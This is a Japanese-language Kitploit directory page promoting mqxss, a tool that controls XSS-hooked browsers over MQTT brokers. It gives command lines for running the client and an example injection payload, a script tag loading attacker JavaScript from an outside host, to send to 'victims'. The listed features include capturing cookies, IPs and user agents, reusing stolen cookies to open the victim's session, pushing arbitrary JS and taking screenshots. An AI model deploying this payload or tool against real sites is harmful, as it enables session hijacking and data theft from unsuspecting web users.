Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/grampae/mqxss
ペイロード生成ウェブアプリケーション悪用情報収集ペネトレーションテストコマンド&コントロールレッドチーミングリモートアクセスツール
GitHubgrampae/mqxss

mqxss

MQTTを介したフック済みブラウザ通信

リポジトリを見る
82年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

mqxss v0.2

mqxssはMQTTを介してフックされたブラウザと通信するクライアントとして動作します

2023-07-03 15-15-35のスクリーンショット

beefやxsshunterよりもこれを使う利点は、jsペイロードをホストする以外にインフラのセットアップが不要なことです。パブリックブローカーを使用できます(ただし、現在は難読化を使用しており、暗号化は開発中です)。

フックされたブラウザは、指定したブローカーのMQTTトピックで通信します。これをテストするためのパブリック/フリーブローカーが多数あります。

クライアントはPythonのpaho.mqttライブラリを利用し、jsペイロードは'https://cdnjs.cloudflare.com/ajax/libs/paho-mqtt/1.0.1/mqttws31.min.js'から取得する'mqttws31.min.js'を利用します。


使い方

2024-01-17 11-34-59のスクリーンショット

ブラウザをフックするためのJSペイロードを生成するには、実行時に-gフラグをブローカー、ポート、トピック変数とともに設定します。これにより、/js/フォルダ内にペイロードが作成されます。

クライアントを実行するには、ブローカー、ポート、トピックを次のように指定します。

mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname

認証情報を指定してクライアントを実行するには、ブローカー、ポート、ユーザー名、パスワード、トピックを次のように指定します。

mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname -u username -pw password

mqxssクライアントの実行中に、被害者へXSSペイロードを送信します。例: '"><script src=https://example.com/x.js async></script> など。脆弱な場合、ブラウザが接続され、Cookieなどの基本情報を含む通知が表示されます。

a


機能:

  • jsペイロードはMQTT QoS 1とLast Willを利用し、クライアントがブローカーに接続していない間に発生する切断や接続をmqxssが通知を受ける
  • 実行時にブラウザをフックするためのjsペイロードを生成
  • 現在はセキュアなWebSocketを使用するMQTTブローカーでのみ動作
  • 便利なように、取得したCookieを使ってブラウザでフックされたブラウザの場所を開く
  • フック時にCookie、IP、デバイスタイプ、ユーザーエージェントを取得
  • 過去にフックされた(フック解除された)ブラウザを表示
  • 現在フックされているブラウザにjsを送信し、応答があれば取得
  • フックされたブラウザのスクリーンショット
  • 実行時に必要とするブローカーのユーザー名、パスワードを設定
  • mqxss.pyでptoken変数とuserkey変数を設定し、-poコマンドラインオプションを使用してPushover通知
ツールをダウンロード